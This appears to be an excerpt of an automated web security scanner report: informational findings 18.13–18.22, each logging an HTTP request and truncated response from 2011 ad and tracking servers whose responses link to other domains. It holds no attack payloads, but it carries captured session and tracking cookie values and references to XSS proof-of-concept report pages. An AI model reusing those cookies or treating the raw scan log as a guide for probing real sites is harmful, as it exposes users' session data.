GET /js_1_0/?config=1001507650&type=news&ctxtId=news&keywordCharEnc=utf8&source=npc_mcclatchy_sacramentobee_t2_ctxt&adwd=728&adht=90&ctxtUrl=http%3A%2F%2Fblogs.sacbee.com%2Fthe_state_worker%2F%23navlink%3Dnavdrop&ctxtCat=news&outputCharEnc=latin1&css_url=http://static.mcclatchyinteractive.com/static/styles/mi/third_party/yahoo/yahoo.css&tg=1&refUrl=http%3A%2F%2Fwww.sacbee.com%2F2011%2F09%2F03%2F3883102%2Fsprint-could-be-winner-in-thwarted.html&du=1&cb=1315097337736&ctxtContent=%3Chead%3E%3Cscript%20async%3D%22%22%20src%3D%22http%3A%2F%2Fwww.publish2.com%2Fnewsgroups%2Fstate-worker.js%3Fjsonp_callback%3DjQuery15205311797398608178_1315097321812%26amp%3B_%3D1315097336789%22%3E%3C%2Fscript%3E%3Cscript%20async%3D%22%22%20src%3D%22http%3A%2F%2Fapi.twitter.com%2F1%2Fstatuses%2Fuser_timeline.json%3Fscreen_name%3DTheStateWorker%26amp%3Bcallback%3DjQuery15205311797398608178_1315097321811%26amp%3B_%3D1315097336786%22%3E%3C%2Fscript%3E%0A%20%20%20%20%3Cscript%20type%3D%22text%2Fjavascript%22%20async%3D%22%22%20src%3D%22http%3A%2F%2Fwww.scribd.com%2Fjavascripts%2Fembed_code%2Finject.js%22%3E%3C%2Fscript%3E%3Cscript%20type%3D%22text%2Fjavascript%22%3E%0A%20%20 HTTP/1.1
Host: cm.npc-mcclatchy.overture.com
Proxy-Connection: keep-alive
Referer: http://blogs.sacbee.com/the_state_worker/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BX=228g5ih765ieg&b=3&s=bh; UserData=02u3hs9yoaLQsFTjBpNDM2dzC3MXI0MLCyMzRSME%2bLSi4sTU1JNbEBAGNDYyNXQxNTZ0MAZ7BMtQw=

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 01:03:14 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Set-Cookie: UserData=02u3hs9yoaLQsFTjBpNDM2dzC3MXI0MLCyMzRSME%2bLSi4sTU1JNbEBAGNDYyM3QzdTZwMAR/lMxQw=; Domain=.overture.com; Path=/; Max-Age=315360000; Expires=Wed, 01-Sep-2021 01:03:14 GMT
Cache-Control: no-cache, private
Pragma: no-cache
Expires: 0
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 814


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>

<head>
<base target="_blank">
<meta http-equiv="Content-Type" content="text/html; charse
...[SNIP]...
</title>

<link rel="stylesheet" href="http://static.mcclatchyinteractive.com/static/styles/mi/third_party/yahoo/yahoo.css" type="text/css">
<style type="text/css">
...[SNIP]...

18.13. http://cms.ad.yieldmanager.net/v1/cms

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cms.ad.yieldmanager.net
Path:   /v1/cms

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following link to another domain:

Request

GET /v1/cms?esig=1~862d802dd86fb59368388ad078a7f298ddbbd0b7&nwid=10000424978&sigv=1 HTTP/1.1
Host: cms.ad.yieldmanager.net
Proxy-Connection: keep-alive
Referer: http://cdn.turn.com/server/ddc.htm?uid=2925993182975414771&mktid=27&mpid=3808468&fpid=-1&rnd=7044539534532983673&nu=n&sp=n&ctid=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BX=ei08qcd75vc4d&b=3&s=8s&t=245

Response

HTTP/1.1 302 Found
Date: Sun, 04 Sep 2011 00:56:33 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Location: http://r.turn.com/r/cms/id/0/ddc/1/pid/43/uid/?xid=u02DzKG_.KFBo5S2yyqljPCE
Cache-Control: private
Connection: close
Content-Type: text/plain; charset=utf-8
Content-Length: 792

HTTP/1.1 302 Found
Date: Sun, 04 Sep 2011 00:56:33 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PU
...[SNIP]...
n.com/r/cms/id/0/ddc/1/pid/43/uid/?xid=u02DzKG_.KFBo5S2yyqljPCE
Cache-Control: private
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html; charset=utf-8

The document has moved <A HREF="http://r.turn.com/r/cms/id/0/ddc/1/pid/43/uid/?xid=u02DzKG_.KFBo5S2yyqljPCE">here</A>
...[SNIP]...

18.14. http://gannett.gcion.com/addyn/3.0/5111.1/778079/0/-1/ADTECH

Summary

Severity:   Information
Confidence:   Certain
Host:   http://gannett.gcion.com
Path:   /addyn/3.0/5111.1/778079/0/-1/ADTECH

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following link to another domain:

Request

GET /addyn/3.0/5111.1/778079/0/-1/ADTECH;alias=content.usatoday.com/communities/campusrivalry_Bottom728x90;cookie=info;loc=100;target=_blank;grp=22926;misc=1315097316264;noperf=1;size=728x90;key=College+Athletes+Teams+Coaches+More+Campus+Rivalry+Topics+USATODAYcom;kvtitle=College-Athletes-Teams-Coaches--More-Campus-Rivalry-Topics---USATODAYcom HTTP/1.1
Host: gannett.gcion.com
Proxy-Connection: keep-alive
Referer: http://content.usatoday.com/communities/campusrivalry/topics
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CfP=1; JEB2=4E62BFAA6E651A4418BD90FFF0005EB9; rsi_segs=

Response

HTTP/1.1 200 OK
Server: Adtech Adserver
Cache-Control: no-cache
Content-Type: application/x-javascript
Content-Length: 941
Date: Sun, 04 Sep 2011 00:48:05 GMT
Age: 0
Connection: close

rubSect = "";
if (window.location.pathname.indexOf("life") != -1) rubSect = 7103;
else if (window.location.pathname.indexOf("auto") != -1) rubSect = 7208;
else if (window.location.pathname.indexOf("mo
...[SNIP]...
ubSect = 7106;
else if (window.location.pathname.indexOf("tech") != -1) rubSect = 7107;
else if (window.location.pathname.indexOf("weather") != -1) rubSect = 7108;
else rubSect = 7102;
document.write('<IFRAME SRC="http://optimized-by.rubiconproject.com/a/4462/5032/'+rubSect+'-2.html" FRAMEBORDER="0" MARGINWIDTH="0" MARGINHEIGHT="0" SCROLLING="NO" WIDTH="728" HEIGHT="90"></IFRAME>
...[SNIP]...

18.15. http://googleads.g.doubleclick.net/pagead/ads

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1315115706&flash=10.3.183&url=file%3A%2F%2F%2FD%3A%2Fcdn%2F2011%2F09%2F03%2Fghdb%2Fdork-reflected-xss-cross-site-scripting-cwe79-capec86-javascript-rest-url-parameter-injection-example-poc-report-sprintnet.html&dt=1315097706824&bpp=3&shv=r20110824&jsv=r20110719&correlator=1315097706982&frm=4&adk=1607234649&ga_vid=1374080911.1315097707&ga_sid=1315097707&ga_hid=486991809&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=20&u_nmime=100&dff=times%20new%20roman&dfs=16&adx=8&ady=247&biw=1217&bih=1037&eid=36887102&fu=0&ifi=1&dtd=617&xpc=yKatmybmDr&p=file%3A// HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=229b025847010047||t=1314754416|et=730|cs=002213fd48ab1c4d1bf867f0d1

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sun, 04 Sep 2011 00:54:29 GMT
Server: cafe
Cache-Control: private
Content-Length: 4157
X-XSS-Protection: 1; mode=block

<!doctype html><html><head><style><!--
a:link { color: #000000 }a:visited { color: #000000 }a:hover { color: #000000 }a:active { color: #000000 } --></style><script><!--
(function(){window.ss=functio
...[SNIP]...
<div id=abgb><img src='http://pagead2.googlesyndication.com/pagead/images/ad_choices_i.png' alt="(i)" border=0 height=15px width=19px/></div><div id=abgs><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dfile:///D:/cdn/2011/09/03/ghdb/dork-reflected-xss-cross-site-scripting-cwe79-capec86-javascript-rest-url-parameter-injection-example-poc-report-sprintnet.html%26hl%3Den%26client%3Dca-pub-4063878933780912%26adU%3Dwww.saintcorporation.com%26adT%3DImageAd%26gl%3DUS&amp;usg=AFQjCNEeZAi0MNZ0nSRwEb8-GFgs1kCttQ" target=_blank><img alt="AdChoices" border=0 height=15px src=http://pagead2.googlesyndication.com/pagead/images/ad_choices_en.png width=77px/></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/js/r20110824/r20110719/abg.js"></script>
...[SNIP]...

18.16. http://googleads.g.doubleclick.net/pagead/ads

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1315116151&flash=10.3.183&url=file%3A%2F%2F%2FD%3A%2Fcdn%2F2011%2F09%2F03%2Fghdb%2Fdork-reflected-xss-cross-site-scripting-cwe79-capec86-javascript-rest-url-parameter-injection-example-poc-report-undcom.html&dt=1315098151576&bpp=4&shv=r20110824&jsv=r20110719&correlator=1315098151731&frm=4&adk=1607234649&ga_vid=1674271352.1315098152&ga_sid=1315098152&ga_hid=1278190803&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=20&u_nmime=100&dff=times%20new%20roman&dfs=16&adx=8&ady=268&biw=1217&bih=1037&eid=36887102&fu=0&ifi=1&dtd=338&xpc=FQEN0g4JJE&p=file%3A// HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=229b025847010047||t=1314754416|et=730|cs=002213fd48ab1c4d1bf867f0d1

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sun, 04 Sep 2011 01:01:54 GMT
Server: cafe
Cache-Control: private
Content-Length: 4097
X-XSS-Protection: 1; mode=block

<!doctype html><html><head><style><!--
a:link { color: #000000 }a:visited { color: #000000 }a:hover { color: #000000 }a:active { color: #000000 } --></style><script><!--
(function(){window.ss=functio
...[SNIP]...
<div id=abgb><img src='http://pagead2.googlesyndication.com/pagead/images/ad_choices_i.png' alt="(i)" border=0 height=15px width=19px/></div><div id=abgs><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dfile:///D:/cdn/2011/09/03/ghdb/dork-reflected-xss-cross-site-scripting-cwe79-capec86-javascript-rest-url-parameter-injection-example-poc-report-undcom.html%26hl%3Den%26client%3Dca-pub-4063878933780912%26adU%3Dwww.saintcorporation.com%26adT%3DImageAd%26gl%3DUS&amp;usg=AFQjCNHo7SBDCF2uslnemtGZcmE44Bq3iQ" target=_blank><img alt="AdChoices" border=0 height=15px src=http://pagead2.googlesyndication.com/pagead/images/ad_choices_en.png width=77px/></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/js/r20110824/r20110719/abg.js"></script>
...[SNIP]...

18.17. http://googleads.g.doubleclick.net/pagead/ads

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1315115693&flash=10.3.183&url=http%3A%2F%2Fxss.cx%2F2011%2F09%2F03%2Fghdb%2Fdork-reflected-xss-cross-site-scripting-cwe79-capec86-javascript-rest-url-parameter-injection-example-poc-report-sprintnet.html&dt=1315097710130&bpp=24&shv=r20110824&jsv=r20110719&correlator=1315097710547&frm=4&adk=1607234649&ga_vid=1516282008.1315097711&ga_sid=1315097711&ga_hid=478706506&ga_fc=0&u_tz=-300&u_his=2&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=20&u_nmime=100&dff=times%20new%20roman&dfs=16&adx=8&ady=246&biw=1217&bih=1037&eid=33895167%2C36887102&fu=0&ifi=1&dtd=532&xpc=tWKiPIw10q&p=http%3A//xss.cx HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=229b025847010047||t=1314754416|et=730|cs=002213fd48ab1c4d1bf867f0d1

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sun, 04 Sep 2011 00:54:33 GMT
Server: cafe
Cache-Control: private
Content-Length: 12725
X-XSS-Protection: 1; mode=block

<!doctype html><html><head><style>a{color:#0000ff}body,table,div,ul,li{margin:0;padding:0}</style><script>(function(){window.ss=function(d,e){window.status=d;var c=document.getElementById(e);if(c){var
...[SNIP]...
<div style="right:2px;position:absolute;top:2px"><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://xss.cx/2011/09/03/ghdb/dork-reflected-xss-cross-site-scripting-cwe79-capec86-javascript-rest-url-parameter-injection-example-poc-report-sprintnet.html%26hl%3Den%26client%3Dca-pub-4063878933780912%26adU%3Dwww.saintcorporation.com%26adT%3DVulnerability%2BScanner%2B%2526amp%253B%26adU%3Dvulnerability.scan.qualys.com%26adT%3DWireless%2BVulnerability%2BScanner%26adU%3Dtrust-guard.com/technologyindustries%26adT%3DWebsite%2BSecurity%2BHere%26gl%3DUS&amp;usg=AFQjCNGmI3hB4sGEIhlB1reRmGreSbQArQ" target=_blank><img alt="AdChoices" border=0 height=16 src="http://pagead2.googlesyndication.com/pagead/abglogo/adc-en-100c-000000.png" ></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/sma8.js"></script>
...[SNIP]...

18.18. http://googleads.g.doubleclick.net/pagead/ads

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1315116134&flash=10.3.183&url=http%3A%2F%2Fxss.cx%2F2011%2F09%2F03%2Fghdb%2Fdork-reflected-xss-cross-site-scripting-cwe79-capec86-javascript-rest-url-parameter-injection-example-poc-report-undcom.html&dt=1315098160075&bpp=16&shv=r20110824&jsv=r20110719&correlator=1315098160332&frm=4&adk=1607234649&ga_vid=2026745983.1315098160&ga_sid=1315098160&ga_hid=935076766&ga_fc=0&u_tz=-300&u_his=2&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=20&u_nmime=100&dff=times%20new%20roman&dfs=16&biw=1217&bih=1037&fu=0&ifi=1&dtd=387&xpc=PO0BPGvJ0B&p=http%3A//xss.cx HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=229b025847010047||t=1314754416|et=730|cs=002213fd48ab1c4d1bf867f0d1

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sun, 04 Sep 2011 01:02:03 GMT
Server: cafe
Cache-Control: private
Content-Length: 12665
X-XSS-Protection: 1; mode=block

<!doctype html><html><head><style>a{color:#0000ff}body,table,div,ul,li{margin:0;padding:0}</style><script>(function(){window.ss=function(d,e){window.status=d;var c=document.getElementById(e);if(c){var
...[SNIP]...
<div style="right:2px;position:absolute;top:2px"><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://xss.cx/2011/09/03/ghdb/dork-reflected-xss-cross-site-scripting-cwe79-capec86-javascript-rest-url-parameter-injection-example-poc-report-undcom.html%26hl%3Den%26client%3Dca-pub-4063878933780912%26adU%3Dwww.saintcorporation.com%26adT%3DVulnerability%2BScanner%2B%2526amp%253B%26adU%3Dvulnerability.scan.qualys.com%26adT%3DSecurity%2BVulnerability%2BScanner%26adU%3Dgfi.com/Business-Antivirus%26adT%3DSMB%2BCyber%2BProtection%2BTips%26gl%3DUS&amp;usg=AFQjCNFAnYMx1TYuYqPvlmySuAsVJGADVw" target=_blank><img alt="AdChoices" border=0 height=16 src="http://pagead2.googlesyndication.com/pagead/abglogo/adc-en-100c-000000.png" ></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/sma8.js"></script>
...[SNIP]...

18.19. http://googleads.g.doubleclick.net/pagead/ads

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string. The response contains the following links to other domains (shown in the response excerpt below).

Request

GET /pagead/ads?client=ca-pub-9055644179108667&output=html&h=125&slotname=6753566882&w=130&lmt=1315115338&ea=0&flash=10.3.183&url=http%3A%2F%2Fwww.reuters.com%2Farticle%2F2011%2F09%2F04%2Fus-weather-football-idUSTRE78222D20110904&dt=1315097338895&shv=r20110824&jsv=r20110719&saldr=1&correlator=1315097338906&frm=7&adk=1459060001&ga_vid=1034678471.1315097339&ga_sid=1315097339&ga_hid=333995562&ga_fc=0&u_tz=-300&u_his=2&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=20&u_nmime=100&dff=times%20new%20roman&dfs=16&biw=1217&bih=1037&ifk=3636996462&fu=4&ifi=1&dtd=14 HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=229b025847010047||t=1314754416|et=730|cs=002213fd48ab1c4d1bf867f0d1

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sun, 04 Sep 2011 00:48:22 GMT
Server: cafe
Cache-Control: private
Content-Length: 4339
X-XSS-Protection: 1; mode=block

<!doctype html><html><head><style>a{color:#0000ff}body,table,div,ul,li{margin:0;padding:0}</style><script>(function(){window.ss=function(a){window.status=a;return!0};})();function su(id) {var a = docu
...[SNIP]...
<div style="right:2px;position:absolute;top:2px"><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://www.reuters.com/article/2011/09/04/us-weather-football-idUSTRE78222D20110904%26hl%3Den%26client%3Dca-pub-9055644179108667%26adU%3DGoDaddy.com/SSL%26adT%3D%252412.99%2BGoDaddy%2BSSL%2BSave%26gl%3DUS&amp;usg=AFQjCNE-4kdAeCWujwFJxVMFnVYRoLPgjQ" target=_blank><img alt="AdChoices" border=0 height=16 src="http://pagead2.googlesyndication.com/pagead/abglogo/adc-en-100c-000000.png" ></a>
...[SNIP]...

18.20. http://img.mediaplex.com/content/0/10105/PC_YR11_720x300_Anniv_HrtsndprntPwtrpltThennowfrme_hp.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://img.mediaplex.com
Path:   /content/0/10105/PC_YR11_720x300_Anniv_HrtsndprntPwtrpltThennowfrme_hp.js

Issue detail

The page was loaded from a URL containing a query string. The response contains the following link to another domain (shown in the response excerpt below).

Request

GET /content/0/10105/PC_YR11_720x300_Anniv_HrtsndprntPwtrpltThennowfrme_hp.js?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F10105-135615-9432-62%3Fmpt%3D357951025&mpt=357951025&mpvc=http://c.casalemedia.com/c/1/1/89733/ HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://cdn.optmd.com/V2/89733/235451/index.html?g=Af////8=&r=www.sacbee.com/2011/09/03/3883102/sprint-could-be-winner-in-thwarted.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=993782327310; mojo2=3484:8030; mojo3=10105:9432/13966:3335/3484:36959

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 00:54:48 GMT
Server: Apache
Last-Modified: Thu, 01 Sep 2011 01:13:50 GMT
ETag: "836c99-1012-4abd6f5152f80"
Accept-Ranges: bytes
Content-Length: 4480
Content-Type: application/x-javascript

var mojopro2 = window.location.protocol;
if (mojopro2 == "https:") {
mojosrc = "https://secure.img-cdn.mediaplex.com/0/documentwrite.js";
}
else
{
mojosrc = "http://img-cdn.mediaplex.com/0/documentw
...[SNIP]...
Write( mp_html );
else
document.write( mp_html );
} else if( !( navigator.appName && navigator.appName.indexOf("Netscape") >= 0 && navigator.appVersion.indexOf("2.") >= 0 ) ) {
document.write('<a href="http://c.casalemedia.com/c/1/1/89733/http://altfarm.mediaplex.com/ad/ck/10105-135615-9432-62?mpt=357951025" target="_blank"><img src="http://img-cdn.mediaplex.com/0/10105/PC_YR11_720x300_Anniv_HrtsndprntPwtrpltThennowfrme_hp.jpg" width="720" height="300" border="0" alt="">
...[SNIP]...

18.21. http://imp.fetchback.com/serve/fb/imp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://imp.fetchback.com
Path:   /serve/fb/imp

Issue detail

The page was loaded from a URL containing a query string. The response contains the following link to another domain (shown in the response excerpt below).

Request

GET /serve/fb/imp?tid=68285&type=mrect&clicktrack=http://optimized-by.rubiconproject.com/t/4462/5032/7102-15.3214998.3237979?url= HTTP/1.1
Host: imp.fetchback.com
Proxy-Connection: keep-alive
Referer: http://content.usatoday.com/communities/campusrivalry/topics
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cmp=1_1314893682_16771:0; sit=1_1314893682_3984:0:0; bpd=1_1314893682; apd=1_1314893682; afl=1_1314893682; cre=1_1315097051_34024:68283:2:0:92_34024:68292:2:118888:118970_34023:68293:1:119601:119601; kwd=1_1315097051; scg=1_1315097051; ppd=1_1315097051; act=1_1315097051; uid=1_1315097284_1314893682667:5756480826433243

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 00:55:00 GMT
Server: Apache/2.2.3 (Red Hat)
Set-Cookie: cre=1_1315097700_34021:68285:2:0:415_34024:68283:2:649:741_34024:68292:2:119537:119619_34023:68293:1:120250:120250; Domain=.fetchback.com; Expires=Fri, 02-Sep-2016 00:55:00 GMT; Path=/
Set-Cookie: uid=1_1315097700_1314893682667:5756480826433243; Domain=.fetchback.com; Expires=Fri, 02-Sep-2016 00:55:00 GMT; Path=/
Set-Cookie: kwd=1_1315097700; Domain=.fetchback.com; Expires=Fri, 02-Sep-2016 00:55:00 GMT; Path=/
Set-Cookie: scg=1_1315097700; Domain=.fetchback.com; Expires=Fri, 02-Sep-2016 00:55:00 GMT; Path=/
Set-Cookie: ppd=1_1315097700; Domain=.fetchback.com; Expires=Fri, 02-Sep-2016 00:55:00 GMT; Path=/
Set-Cookie: act=1_1315097700; Domain=.fetchback.com; Expires=Fri, 02-Sep-2016 00:55:00 GMT; Path=/
Cache-Control: max-age=0, no-store, must-revalidate, no-cache
Expires: Sun, 04 Sep 2011 00:55:00 GMT
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 5492

<style type="text/css">body {margin: 0px; padding: 0px;}</style><style type="text/css">
/*
TODO customize this sample style
Syntax recommendation http://www.w3.org/TR/REC-CSS2/
*/

button.fb-fi
...[SNIP]...
<td align="center"><a href="http://get.adobe.com/flashplayer/" target="_blank">Can not display content.<br>
...[SNIP]...

18.22. http://s6.scribdassets.com/aggregated/javascript/base.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://s6.scribdassets.com
Path:   /aggregated/javascript/base.js

Issue detail

The page was loaded from a URL containing a query string. The response contains the following links to other domains (shown in the response excerpt below).

Request

GET /aggregated/javascript/base.js?1314908997 HTTP/1.1
Host: s6.scribdassets.com
Proxy-Connection: keep-alive
Referer: http://www.scribd.com/embeds/63688924/content?start_page=1&view_mode=list&access_key=key-2mw49i3od1t7hxagubzd
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 00:56:30 GMT
Server: PWS/1.7.3.3
